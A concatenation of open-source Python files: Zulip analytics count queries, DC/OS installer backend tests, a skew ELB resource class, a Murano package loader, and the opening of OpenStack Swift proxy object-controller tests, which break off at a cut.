user_activity_intervals = UserActivityInterval.objects.filter(
end__gt=start_time, start__lt=end_time,
).select_related(
'user_profile',
).values_list(
'user_profile_id', 'user_profile__realm_id', 'start', 'end')
seconds_active: Dict[Tuple[int, int], float] = defaultdict(float)
for user_id, realm_id, interval_start, interval_end in user_activity_intervals:
if realm is None or realm.id == realm_id:
start = max(start_time, interval_start)
end = min(end_time, interval_end)
seconds_active[(user_id, realm_id)] += (end - start).total_seconds()
rows = [UserCount(user_id=ids[0], realm_id=ids[1], property=property,
end_time=end_time, value=int(seconds // 60))
for ids, seconds in seconds_active.items() if seconds >= 60]
UserCount.objects.bulk_create(rows)
return len(rows)
def count_message_by_user_query(realm: Optional[Realm]) -> QueryFn:
if realm is None:
realm_clause = SQL("")
else:
realm_clause = SQL("zerver_userprofile.realm_id = {} AND").format(Literal(realm.id))
return lambda kwargs: SQL("""
INSERT INTO analytics_usercount
(user_id, realm_id, value, property, subgroup, end_time)
SELECT
zerver_userprofile.id, zerver_userprofile.realm_id, count(*),
%(property)s, {subgroup}, %(time_end)s
FROM zerver_userprofile
JOIN zerver_message
ON
zerver_userprofile.id = zerver_message.sender_id
WHERE
zerver_userprofile.date_joined < %(time_end)s AND
zerver_message.date_sent >= %(time_start)s AND
{realm_clause}
zerver_message.date_sent < %(time_end)s
GROUP BY zerver_userprofile.id {group_by_clause}
""").format(**kwargs, realm_clause=realm_clause)
# Note: ignores the group_by / group_by_clause.
def count_message_type_by_user_query(realm: Optional[Realm]) -> QueryFn:
if realm is None:
realm_clause = SQL("")
else:
realm_clause = SQL("zerver_userprofile.realm_id = {} AND").format(Literal(realm.id))
return lambda kwargs: SQL("""
INSERT INTO analytics_usercount
(realm_id, user_id, value, property, subgroup, end_time)
SELECT realm_id, id, SUM(count) AS value, %(property)s, message_type, %(time_end)s
FROM
(
SELECT zerver_userprofile.realm_id, zerver_userprofile.id, count(*),
CASE WHEN
zerver_recipient.type = 1 THEN 'private_message'
WHEN
zerver_recipient.type = 3 THEN 'huddle_message'
WHEN
zerver_stream.invite_only = TRUE THEN 'private_stream'
ELSE 'public_stream'
END
message_type
FROM zerver_userprofile
JOIN zerver_message
ON
zerver_userprofile.id = zerver_message.sender_id AND
zerver_message.date_sent >= %(time_start)s AND
{realm_clause}
zerver_message.date_sent < %(time_end)s
JOIN zerver_recipient
ON
zerver_message.recipient_id = zerver_recipient.id
LEFT JOIN zerver_stream
ON
zerver_recipient.type_id = zerver_stream.id
GROUP BY
zerver_userprofile.realm_id, zerver_userprofile.id,
zerver_recipient.type, zerver_stream.invite_only
) AS subquery
GROUP BY realm_id, id, message_type
""").format(**kwargs, realm_clause=realm_clause)
# This query joins to the UserProfile table since all current queries that
# use this also subgroup on UserProfile.is_bot. If in the future there is a
# stat that counts messages by stream and doesn't need the UserProfile
# table, consider writing a new query for efficiency.
def count_message_by_stream_query(realm: Optional[Realm]) -> QueryFn:
if realm is None:
realm_clause = SQL("")
else:
realm_clause = SQL("zerver_stream.realm_id = {} AND").format(Literal(realm.id))
return lambda kwargs: SQL("""
INSERT INTO analytics_streamcount
(stream_id, realm_id, value, property, subgroup, end_time)
SELECT
zerver_stream.id, zerver_stream.realm_id, count(*), %(property)s, {subgroup}, %(time_end)s
FROM zerver_stream
JOIN zerver_recipient
ON
zerver_stream.id = zerver_recipient.type_id
JOIN zerver_message
ON
zerver_recipient.id = zerver_message.recipient_id
JOIN zerver_userprofile
ON
zerver_message.sender_id = zerver_userprofile.id
WHERE
zerver_stream.date_created < %(time_end)s AND
zerver_recipient.type = 2 AND
zerver_message.date_sent >= %(time_start)s AND
{realm_clause}
zerver_message.date_sent < %(time_end)s
GROUP BY zerver_stream.id {group_by_clause}
""").format(**kwargs, realm_clause=realm_clause)
# Hardcodes the query needed by active_users:is_bot:day, since that is
# currently the only stat that uses this.
def count_user_by_realm_query(realm: Optional[Realm]) -> QueryFn:
if realm is None:
realm_clause = SQL("")
else:
realm_clause = SQL("zerver_userprofile.realm_id = {} AND").format(Literal(realm.id))
return lambda kwargs: SQL("""
INSERT INTO analytics_realmcount
(realm_id, value, property, subgroup, end_time)
SELECT
zerver_realm.id, count(*), %(property)s, {subgroup}, %(time_end)s
FROM zerver_realm
JOIN zerver_userprofile
ON
zerver_realm.id = zerver_userprofile.realm_id
WHERE
zerver_realm.date_created < %(time_end)s AND
zerver_userprofile.date_joined >= %(time_start)s AND
zerver_userprofile.date_joined < %(time_end)s AND
{realm_clause}
zerver_userprofile.is_active = TRUE
GROUP BY zerver_realm.id {group_by_clause}
""").format(**kwargs, realm_clause=realm_clause)
# Currently hardcodes the query needed for active_users_audit:is_bot:day.
# Assumes that a user cannot have two RealmAuditLog entries with the same event_time and
# event_type in [RealmAuditLog.USER_CREATED, USER_DEACTIVATED, etc].
# In particular, it's important to ensure that migrations don't cause that to happen.
def check_realmauditlog_by_user_query(realm: Optional[Realm]) -> QueryFn:
if realm is None:
realm_clause = SQL("")
else:
realm_clause = SQL("realm_id = {} AND").format(Literal(realm.id))
return lambda kwargs: SQL("""
INSERT INTO analytics_usercount
(user_id, realm_id, value, property, subgroup, end_time)
SELECT
ral1.modified_user_id, ral1.realm_id, 1, %(property)s, {subgroup}, %(time_end)s
FROM zerver_realmauditlog ral1
JOIN (
SELECT modified_user_id, max(event_time) AS max_event_time
FROM zerver_realmauditlog
WHERE
event_type in ({user_created}, {user_activated}, {user_deactivated}, {user_reactivated}) AND
{realm_clause}
event_time < %(time_end)s
GROUP BY modified_user_id
) ral2
ON
ral1.event_time = max_event_time AND
ral1.modified_user_id = ral2.modified_user_id
JOIN zerver_userprofile
ON
ral1.modified_user_id = zerver_userprofile.id
WHERE
ral1.event_type in ({user_created}, {user_activated}, {user_reactivated})
""").format(
**kwargs,
user_created=Literal(RealmAuditLog.USER_CREATED),
user_activated=Literal(RealmAuditLog.USER_ACTIVATED),
user_deactivated=Literal(RealmAuditLog.USER_DEACTIVATED),
user_reactivated=Literal(RealmAuditLog.USER_REACTIVATED),
realm_clause=realm_clause,
)
def check_useractivityinterval_by_user_query(realm: Optional[Realm]) -> QueryFn:
if realm is None:
realm_clause = SQL("")
else:
realm_clause = SQL("zerver_userprofile.realm_id = {} AND").format(Literal(realm.id))
return lambda kwargs: SQL("""
INSERT INTO analytics_usercount
(user_id, realm_id, value, property, subgroup, end_time)
SELECT
zerver_userprofile.id, zerver_userprofile.realm_id, 1, %(property)s, {subgroup}, %(time_end)s
FROM zerver_userprofile
JOIN zerver_useractivityinterval
ON
zerver_userprofile.id = zerver_useractivityinterval.user_profile_id
WHERE
zerver_useractivityinterval.end >= %(time_start)s AND
{realm_clause}
zerver_useractivityinterval.start < %(time_end)s
GROUP BY zerver_userprofile.id {group_by_clause}
""").format(**kwargs, realm_clause=realm_clause)
def count_realm_active_humans_query(realm: Optional[Realm]) -> QueryFn:
if realm is None:
realm_clause = SQL("")
else:
realm_clause = SQL("realm_id = {} AND").format(Literal(realm.id))
return lambda kwargs: SQL("""
INSERT INTO analytics_realmcount
(realm_id, value, property, subgroup, end_time)
SELECT
usercount1.realm_id, count(*), %(property)s, NULL, %(time_end)s
FROM (
SELECT realm_id, user_id
FROM analytics_usercount
WHERE
property = 'active_users_audit:is_bot:day' AND
subgroup = 'false' AND
{realm_clause}
end_time = %(time_end)s
) usercount1
JOIN (
SELECT realm_id, user_id
FROM analytics_usercount
WHERE
property = '15day_actives::day' AND
{realm_clause}
end_time = %(time_end)s
) usercount2
ON
usercount1.user_id = usercount2.user_id
GROUP BY usercount1.realm_id
""").format(**kwargs, realm_clause=realm_clause)
# Currently unused and untested
count_stream_by_realm_query = lambda kwargs: SQL("""
INSERT INTO analytics_realmcount
(realm_id, value, property, subgroup, end_time)
SELECT
zerver_realm.id, count(*), %(property)s, {subgroup}, %(time_end)s
FROM zerver_realm
JOIN zerver_stream
ON
zerver_realm.id = zerver_stream.realm_id AND
WHERE
zerver_realm.date_created < %(time_end)s AND
zerver_stream.date_created >= %(time_start)s AND
zerver_stream.date_created < %(time_end)s
GROUP BY zerver_realm.id {group_by_clause}
""").format(**kwargs)
def get_count_stats(realm: Optional[Realm]=None) -> Dict[str, CountStat]:
## CountStat declarations ##
count_stats_ = [
# Messages Sent stats
# Stats that count the number of messages sent in various ways.
# These are also the set of stats that read from the Message table.
CountStat('messages_sent:is_bot:hour',
sql_data_collector(UserCount, count_message_by_user_query(
realm), (UserProfile, 'is_bot')),
CountStat.HOUR),
CountStat('messages_sent:message_type:day',
sql_data_collector(
UserCount, count_message_type_by_user_query(realm), None),
CountStat.DAY),
CountStat('messages_sent:client:day',
sql_data_collector(UserCount, count_message_by_user_query(realm),
(Message, 'sending_client_id')), CountStat.DAY),
CountStat('messages_in_stream:is_bot:day',
sql_data_collector(StreamCount, count_message_by_stream_query(realm),
(UserProfile, 'is_bot')), CountStat.DAY),
# Number of Users stats
# Stats that count the number of active users in the UserProfile.is_active sense.
# 'active_users_audit:is_bot:day' is the canonical record of which users were
# active on which days (in the UserProfile.is_active sense).
# Important that this stay a daily stat, so that 'realm_active_humans::day' works as expected.
CountStat('active_users_audit:is_bot:day',
sql_data_collector(UserCount, check_realmauditlog_by_user_query(
realm), (UserProfile, 'is_bot')),
CountStat.DAY),
# Important note: LoggingCountStat objects aren't passed the
# Realm argument, because by nature they have a logging
# structure, not a pull-from-database structure, so there's no
# way to compute them for a single realm after the fact (the
# use case for passing a Realm argument).
# Sanity check on 'active_users_audit:is_bot:day', and a archetype for future LoggingCountStats.
# In RealmCount, 'active_users_audit:is_bot:day' should be the partial
# sum sequence of 'active_users_log:is_bot:day', for any realm that
# started after the latter stat was introduced.
LoggingCountStat('active_users_log:is_bot:day',
RealmCount, CountStat.DAY),
# Another sanity check on 'active_users_audit:is_bot:day'. Is only an
# approximation, e.g. if a user is deactivated between the end of the
# day and when this stat is run, they won't be counted. However, is the
# simplest of the three to inspect by hand.
CountStat('active_users:is_bot:day',
sql_data_collector(RealmCount, count_user_by_realm_query(realm), (UserProfile, 'is_bot')),
CountStat.DAY, interval=TIMEDELTA_MAX),
# Messages read stats. messages_read::hour is the total
# number of messages read, whereas
# messages_read_interactions::hour tries to count the total
# number of UI interactions resulting in messages being marked
# as read (imperfect because of batching of some request
# types, but less likely to be overwhelmed by a single bulk
# operation).
LoggingCountStat('messages_read::hour', UserCount, CountStat.HOUR),
LoggingCountStat('messages_read_interactions::hour', UserCount, CountStat.HOUR),
# User Activity stats
# Stats that measure user activity in the UserActivityInterval sense.
CountStat('1day_actives::day',
sql_data_collector(
UserCount, check_useractivityinterval_by_user_query(realm), None),
CountStat.DAY, interval=timedelta(days=1)-UserActivityInterval.MIN_INTERVAL_LENGTH),
CountStat('15day_actives::day',
sql_data_collector(
UserCount, check_useractivityinterval_by_user_query(realm), None),
CountStat.DAY, interval=timedelta(days=15)-UserActivityInterval.MIN_INTERVAL_LENGTH),
CountStat('minutes_active::day', DataCollector(
UserCount, do_pull_minutes_active), CountStat.DAY),
# Rate limiting stats
# Used to limit the number of invitation emails sent by a realm
LoggingCountStat('invites_sent::day', RealmCount, CountStat.DAY),
# Dependent stats
# Must come after their dependencies.
# Canonical account of the number of active humans in a realm on each day.
DependentCountStat('realm_active_humans::day',
sql_data_collector(
RealmCount, count_realm_active_humans_query(realm), None),
CountStat.DAY,
dependencies=['active_users_audit:is_bot:day', '15day_actives::day']),
]
return OrderedDict([(stat.property, stat) for stat in count_stats_])
# To avoid refactoring for now COUNT_STATS can be used as before
COUNT_STATS = get_count_stats()
| shubhamdhama/zulip | analytics/lib/counts.py | Python | apache-2.0 | 29,311 |
import json
import os
import subprocess
import uuid
import passlib.hash
import pytest
import gen
import gen.build_deploy.aws
import release
from dcos_installer import backend
from dcos_installer.config import Config, make_default_config_if_needed, to_config
os.environ["BOOTSTRAP_ID"] = "12345"
@pytest.fixture(scope='module')
def config():
if not os.path.exists('dcos-release.config.yaml'):
pytest.skip("Skipping because there is no configuration in dcos-release.config.yaml")
return release.load_config('dcos-release.config.yaml')
@pytest.fixture(scope='module')
def config_testing(config):
if 'testing' not in config:
pytest.skip("Skipped because there is no `testing` configuration in dcos-release.config.yaml")
return config['testing']
@pytest.fixture(scope='module')
def config_aws(config_testing):
if 'aws' not in config_testing:
pytest.skip("Skipped because there is no `testing.aws` configuration in dcos-release.config.yaml")
return config_testing['aws']
def test_password_hash():
"""Tests that the password hashing method creates de-cryptable hash
"""
password = 'DcosTestingPassword!@#'
# only reads from STDOUT
hash_pw = subprocess.check_output(['dcos_installer', '--hash-password', password])
print(hash_pw)
hash_pw = hash_pw.decode('ascii').strip('\n')
assert passlib.hash.sha512_crypt.verify(password, hash_pw), 'Hash does not match password'
def test_set_superuser_password(tmpdir):
"""Test that --set-superuser-hash works"""
with tmpdir.as_cwd():
tmpdir.join('genconf').ensure(dir=True)
# TODO(cmaloney): Add tests for the behavior around a non-existent config.yaml
# Setting in a non-empty config.yaml which has no password set
make_default_config_if_needed('genconf/config.yaml')
assert 'superuser_password_hash' not in Config('genconf/config.yaml').config
# Set the password
create_fake_build_artifacts(tmpdir)
subprocess.check_call(['dcos_installer', '--set-superuser-password', 'foo'], cwd=str(tmpdir))
# Check that config.yaml has the password set
config = Config('genconf/config.yaml')
assert passlib.hash.sha512_crypt.verify('foo', config['superuser_password_hash'])
def test_generate_node_upgrade_script(tmpdir, monkeypatch):
upgrade_config = """
---
# The name of your DC/OS cluster. Visable in the DC/OS user interface.
cluster_name: 'DC/OS'
master_discovery: static
exhibitor_storage_backend: 'static'
resolvers:
- 8.8.8.8
- 8.8.4.4
ssh_port: 22
process_timeout: 10000
bootstrap_url: file:///opt/dcos_install_tmp
master_list: ['10.0.0.1', '10.0.0.2', '10.0.0.5']
"""
monkeypatch.setenv('BOOTSTRAP_VARIANT', '')
create_config(upgrade_config, tmpdir)
create_fake_build_artifacts(tmpdir)
output = subprocess.check_output(['dcos_installer', '--generate-node-upgrade-script', 'fake'], cwd=str(tmpdir))
assert output.decode('utf-8').splitlines()[-1].split("Node upgrade script URL: ", 1)[1]\
.endswith("dcos_node_upgrade.sh")
try:
subprocess.check_output(['dcos_installer', '--generate-node-upgrade-script'], cwd=str(tmpdir))
except subprocess.CalledProcessError as e:
print(e.output)
assert e.output.decode('ascii') == "Must provide the version of the cluster upgrading from\n"
else:
raise Exception("Test passed, this should not pass without specifying a version number")
def test_version(monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'some-variant')
version_data = subprocess.check_output(['dcos_installer', '--version']).decode()
assert json.loads(version_data) == {
'version': '1.9-dev',
'variant': 'some-variant'
}
def test_good_create_config_from_post(tmpdir):
"""
Test that it creates the config
"""
# Create a temp config
workspace = tmpdir.strpath
temp_config_path = workspace + '/config.yaml'
make_default_config_if_needed(temp_config_path)
temp_ip_detect_path = workspace + '/ip-detect'
f = open(temp_ip_detect_path, "w")
f.write("#/bin/bash foo")
good_post_data = {
"agent_list": ["10.0.0.2"],
"master_list": ["10.0.0.1"],
"cluster_name": "Good Test",
"resolvers": ["4.4.4.4"],
"ip_detect_filename": temp_ip_detect_path
}
expected_good_messages = {}
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
messages = backend.create_config_from_post(
post_data=good_post_data,
config_path=temp_config_path)
assert messages == expected_good_messages
def test_bad_create_config_from_post(tmpdir):
# Create a temp config
workspace = tmpdir.strpath
temp_config_path = workspace + '/config.yaml'
make_default_config_if_needed(temp_config_path)
bad_post_data = {
"agent_list": "foo",
"master_list": ["foo"],
}
expected_bad_messages = {
"agent_list": "Must be a JSON formatted list, but couldn't be parsed the given value `foo` as "
"one because of: Expecting value: line 1 column 1 (char 0)",
"master_list": 'Invalid IPv4 addresses in list: foo',
}
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
messages = backend.create_config_from_post(
post_data=bad_post_data,
config_path=temp_config_path)
assert messages == expected_bad_messages
def test_do_validate_config(tmpdir, monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')
# Create a temp config
genconf_dir = tmpdir.join('genconf')
genconf_dir.ensure(dir=True)
temp_config_path = str(genconf_dir.join('config.yaml'))
# Initialize with defautls
make_default_config_if_needed(temp_config_path)
create_fake_build_artifacts(tmpdir)
expected_output = {
'ip_detect_contents': 'ip-detect script `genconf/ip-detect` must exist',
'ssh_user': 'Must set ssh_user, no way to calculate value.',
'master_list': 'Must set master_list, no way to calculate value.',
'ssh_key_path': 'could not find ssh private key: genconf/ssh_key'
}
with tmpdir.as_cwd():
assert Config(config_path='genconf/config.yaml').do_validate(include_ssh=True) == expected_output
def test_get_config(tmpdir):
workspace = tmpdir.strpath
temp_config_path = workspace + '/config.yaml'
expected_data = {
'cluster_name': 'DC/OS',
'master_discovery': 'static',
'exhibitor_storage_backend': 'static',
'resolvers': ['8.8.8.8', '8.8.4.4'],
'ssh_port': 22,
'process_timeout': 10000,
'bootstrap_url': 'file:///opt/dcos_install_tmp'
}
make_default_config_if_needed(temp_config_path)
config = Config(temp_config_path)
assert expected_data == config.config
def test_determine_config_type(tmpdir):
# Ensure the default created config is of simple type
workspace = tmpdir.strpath
temp_config_path = workspace + '/config.yaml'
make_default_config_if_needed(temp_config_path)
got_output = backend.determine_config_type(config_path=temp_config_path)
expected_output = {
'message': '',
'type': 'minimal',
}
assert got_output == expected_output
def test_success():
mock_config = to_config({
'master_list': ['10.0.0.1', '10.0.0.2', '10.0.0.5'],
'agent_list': ['10.0.0.3', '10.0.0.4']
})
expected_output = {
"success": "http://10.0.0.1",
"master_count": 3,
"agent_count": 2
}
expected_output_bad = {
"success": "",
"master_count": 0,
"agent_count": 0
}
got_output, code = backend.success(mock_config)
mock_config.update({'master_list': '', 'agent_list': ''})
bad_out, bad_code = backend.success(mock_config)
assert got_output == expected_output
assert code == 200
assert bad_out == expected_output_bad
assert bad_code == 400
def test_accept_overrides_for_undefined_config_params(tmpdir):
temp_config_path = tmpdir.strpath + '/config.yaml'
param = ('fake_test_param_name', 'fake_test_param_value')
make_default_config_if_needed(temp_config_path)
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
messages = backend.create_config_from_post(
post_data=dict([param]),
config_path=temp_config_path)
assert not messages, "unexpected validation error: {}".format(messages)
assert Config(config_path=temp_config_path)[param[0]] == param[1]
simple_full_config = """---
cluster_name: DC/OS
master_discovery: static
exhibitor_storage_backend: static
master_list:
- 127.0.0.1
bootstrap_url: http://example.com
"""
def test_do_configure(tmpdir, monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')
create_config(simple_full_config, tmpdir)
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
assert backend.do_configure(config_path='genconf/config.yaml') == 0
aws_base_config = """---
# NOTE: Taking advantage of what isn't talked about not being validated so we don't need valid AWS /
# s3 credentials in this configuration.
aws_template_storage_bucket: psychic
aws_template_storage_bucket_path: mofo-the-gorilla
aws_template_storage_region_name: us-west-2
aws_template_upload: false
"""
def test_do_aws_configure(tmpdir, monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')
create_config(aws_base_config, tmpdir)
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
assert backend.do_aws_cf_configure() == 0
valid_storage_config = """---
master_list:
- 127.0.0.1
aws_template_storage_access_key_id: {key_id}
aws_template_storage_bucket: {bucket}
aws_template_storage_bucket_path: mofo-the-gorilla
aws_template_storage_secret_access_key: {access_key}
aws_template_upload: true
"""
def test_do_aws_cf_configure_valid_storage_config(config_aws, tmpdir, monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')
session = gen.build_deploy.aws.get_test_session(config_aws)
s3 = session.resource('s3')
bucket = str(uuid.uuid4())
s3_bucket = s3.Bucket(bucket)
s3_bucket.create(CreateBucketConfiguration={'LocationConstraint': config_aws['region_name']})
try:
config_str = valid_storage_config.format(
key_id=config_aws["access_key_id"],
bucket=bucket,
access_key=config_aws["secret_access_key"])
create_config(config_str, tmpdir)
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
assert backend.do_aws_cf_configure() == 0
# TODO: add an assertion that the config that was resolved inside do_aws_cf_configure
# ended up with the correct region where the above testing bucket was created.
finally:
objects = [{'Key': o.key} for o in s3_bucket.objects.all()]
s3_bucket.delete_objects(Delete={'Objects': objects})
s3_bucket.delete()
def create_config(config_str, tmpdir):
genconf_dir = tmpdir.join('genconf')
genconf_dir.ensure(dir=True)
config_path = genconf_dir.join('config.yaml')
config_path.write(config_str)
genconf_dir.join('ip-detect').write('#!/bin/bash\necho 127.0.0.1')
def create_fake_build_artifacts(tmpdir):
artifact_dir = tmpdir.join('artifacts/bootstrap')
artifact_dir.ensure(dir=True)
artifact_dir.join('12345.bootstrap.tar.xz').write('contents_of_bootstrap', ensure=True)
artifact_dir.join('12345.active.json').write('["package--version"]', ensure=True)
artifact_dir.join('test_variant.bootstrap.latest').write("12345")
tmpdir.join('artifacts/complete/test_variant.complete.latest.json').write(
'{"bootstrap": "12345", "packages": ["package--version"]}',
ensure=True,
)
tmpdir.join('artifacts/complete/complete.latest.json').write(
'{"bootstrap": "12345", "packages": ["package--version"]}',
ensure=True,
)
tmpdir.join('artifacts/packages/package/package--version.tar.xz').write('contents_of_package', ensure=True)
| darkonie/dcos | dcos_installer/test_backend.py | Python | apache-2.0 | 12,196 |
# Copyright (c) 2014 Scopely, Inc.
# Copyright (c) 2015 Mitch Garnaat
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from skew.resources.aws import AWSResource
class LoadBalancer(AWSResource):
class Meta(object):
service = 'elb'
type = 'loadbalancer'
enum_spec = ('describe_load_balancers',
'LoadBalancerDescriptions', None)
detail_spec = None
id = 'LoadBalancerName'
filter_name = 'LoadBalancerNames'
filter_type = 'list'
name = 'DNSName'
date = 'CreatedTime'
dimension = 'LoadBalancerName'
tags_spec = ('describe_tags', 'TagDescriptions[].Tags[]',
'LoadBalancerNames', 'id')
| ryandub/skew | skew/resources/aws/elb.py | Python | apache-2.0 | 1,155 |
# Copyright (c) 2014 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import sys
import yaml
import murano.packages.application_package
from murano.packages import exceptions
class MuranoPlPackage(murano.packages.application_package.ApplicationPackage):
def __init__(self, source_directory, manifest, loader):
super(MuranoPlPackage, self).__init__(
source_directory, manifest, loader)
self._classes = None
self._ui = None
self._ui_cache = None
self._raw_ui_cache = None
self._classes_cache = {}
@property
def classes(self):
return tuple(self._classes.keys())
@property
def ui(self):
if not self._ui_cache:
self._load_ui(True)
return self._ui_cache
@property
def raw_ui(self):
if not self._raw_ui_cache:
self._load_ui(False)
return self._raw_ui_cache
def get_class(self, name):
if name not in self._classes_cache:
self._load_class(name)
return self._classes_cache[name]
# Private methods
def _load_ui(self, load_yaml=False):
if self._raw_ui_cache and load_yaml:
self._ui_cache = yaml.load(self._raw_ui_cache, self.yaml_loader)
else:
ui_file = self._ui
full_path = os.path.join(self._source_directory, 'UI', ui_file)
if not os.path.isfile(full_path):
self._raw_ui_cache = None
self._ui_cache = None
return
try:
with open(full_path) as stream:
self._raw_ui_cache = stream.read()
if load_yaml:
self._ui_cache = yaml.load(self._raw_ui_cache,
self.yaml_loader)
except Exception as ex:
trace = sys.exc_info()[2]
raise exceptions.PackageUILoadError(str(ex)), None, trace
def _load_class(self, name):
if name not in self._classes:
raise exceptions.PackageClassLoadError(
name, 'Class not defined in this package')
def_file = self._classes[name]
full_path = os.path.join(self._source_directory, 'Classes', def_file)
if not os.path.isfile(full_path):
raise exceptions.PackageClassLoadError(
name, 'File with class definition not found')
try:
with open(full_path) as stream:
self._classes_cache[name] = yaml.load(stream, self.yaml_loader)
except Exception as ex:
trace = sys.exc_info()[2]
msg = 'Unable to load class definition due to "{0}"'.format(
str(ex))
raise exceptions.PackageClassLoadError(name, msg), None, trace
def validate(self):
self._classes_cache.clear()
for class_name in self._classes:
self.get_class(class_name)
self._load_ui(True)
super(MuranoPlPackage, self).validate()
| ativelkov/murano-api | murano/packages/mpl_package.py | Python | apache-2.0 | 3,570 |
#!/usr/bin/env python
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import itertools
import random
import time
import unittest
from contextlib import contextmanager
import mock
from eventlet import Timeout
import swift
from swift.common import utils, swob
from swift.proxy import server as proxy_server
from swift.common.storage_policy import StoragePolicy, POLICIES
from test.unit import FakeRing, FakeMemcache, fake_http_connect, \
debug_logger, patch_policies
from test.unit.proxy.test_server import node_error_count
@contextmanager
def set_http_connect(*args, **kwargs):
old_connect = swift.proxy.controllers.base.http_connect
new_connect = fake_http_connect(*args, **kwargs)
try:
swift.proxy.controllers.base.http_connect = new_connect
swift.proxy.controllers.obj.http_connect = new_connect
swift.proxy.controllers.account.http_connect = new_connect
swift.proxy.controllers.container.http_connect = new_connect
yield new_connect
left_over_status = list(new_connect.code_iter)
if left_over_status:
raise AssertionError('left over status %r' % left_over_status)
finally:
swift.proxy.controllers.base.http_connect = old_connect
swift.proxy.controllers.obj.http_connect = old_connect
swift.proxy.controllers.account.http_connect = old_connect
swift.proxy.controllers.container.http_connect = old_connect
class PatchedObjControllerApp(proxy_server.Application):
"""
This patch is just a hook over handle_request to ensure that when
get_controller is called the ObjectController class is patched to
return a (possibly stubbed) ObjectController class.
"""
object_controller = proxy_server.ObjectController
def handle_request(self, req):
with mock.patch('swift.proxy.server.ObjectController',
new=self.object_controller):
return super(PatchedObjControllerApp, self).handle_request(req)
@patch_policies([StoragePolicy(0, 'zero', True,
object_ring=FakeRing(max_more_nodes=9))])
class TestObjControllerWriteAffinity(unittest.TestCase):
def setUp(self):
self.app = proxy_server.Application(
None, FakeMemcache(), account_ring=FakeRing(),
container_ring=FakeRing(), logger=debug_logger())
self.app.request_node_count = lambda ring: 10000000
self.app.sort_nodes = lambda l: l # stop shuffling the primary nodes
def test_iter_nodes_local_first_noops_when_no_affinity(self):
controller = proxy_server.ObjectController(self.app, 'a', 'c', 'o')
self.app.write_affinity_is_local_fn = None
object_ring = self.app.get_object_ring(None)
all_nodes = object_ring.get_part_nodes(1)
all_nodes.extend(object_ring.get_more_nodes(1))
local_first_nodes = list(controller.iter_nodes_local_first(
object_ring, 1))
self.maxDiff = None
self.assertEqual(all_nodes, local_first_nodes)
def test_iter_nodes_local_first_moves_locals_first(self):
controller = proxy_server.ObjectController(self.app, 'a', 'c', 'o')
self.app.write_affinity_is_local_fn = (
lambda node: node['region'] == 1)
self.app.write_affinity_node_count = lambda ring: 4
object_ring = self.app.get_object_ring(None)
all_nodes = object_ring.get_part_nodes(1)
all_nodes.extend(object_ring.get_more_nodes(1))
local_first_nodes = list(controller.iter_nodes_local_first(
object_ring, 1))
# the local nodes move up in the ordering
self.assertEqual([1, 1, 1, 1],
[node['region'] for node in local_first_nodes[:4]])
# we don't skip any nodes
self.assertEqual(len(all_nodes), len(local_first_nodes))
self.assertEqual(sorted(all_nodes), sorted(local_first_nodes))
def test_connect_put_node_timeout(self):
controller = proxy_server.ObjectController(self.app, 'a', 'c', 'o')
self.app.conn_timeout = 0.05
with set_http_connect(slow_connect=True):
nodes = [dict(ip='', port='', device='')]
res = controller._connect_put_node(nodes, '', '', {}, ('', ''))
self.assertTrue(res is None)
@patch_policies([
StoragePolicy(0, 'zero', True),
StoragePolicy(1, 'one'),
StoragePolicy(2, 'two'),
])
class TestObjController(unittest.TestCase):
container_info = {
'partition': 1,
'nodes': [
{'ip': '127.0.0.1', 'port': '1', 'device': 'sda'},
{'ip': '127.0.0.1', 'port': '2', 'device': 'sda'},
{'ip': '127.0.0.1', 'port': '3', 'device': 'sda'},
],
'write_acl': None,
'read_acl': None,
'storage_policy': None,
'sync_key': None,
'versions': None,
}
def setUp(self):
# setup fake rings with handoffs
self.obj_ring = FakeRing(max_more_nodes=3)
for policy in POLICIES:
policy.object_ring = self.obj_ring
logger = debug_logger('proxy-server')
logger.thread_locals = ('txn1', '127.0.0.2')
self.app = PatchedObjControllerApp(
None, FakeMemcache(), account_ring=FakeRing(),
container_ring=FakeRing(), logger=logger)
class FakeContainerInfoObjController(proxy_server.ObjectController):
def container_info(controller, *args, **kwargs):
patch_path = 'swift.proxy.controllers.base.get_info'
with mock.patch(patch_path) as mock_get_info:
mock_get_info.return_value = dict(self.container_info)
return super(FakeContainerInfoObjController,
controller).container_info(*args, **kwargs)
# this is taking advantage of the fact that self.app is a
# PachedObjControllerApp, so handle_response will route into an
# instance of our FakeContainerInfoObjController just by
# overriding the class attribute for object_controller
self.app.object_controller = FakeContainerInfoObjController
def test_PUT_simple(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT')
req.headers['content-length'] = '0'
with set_http_connect(201, 201, 201):
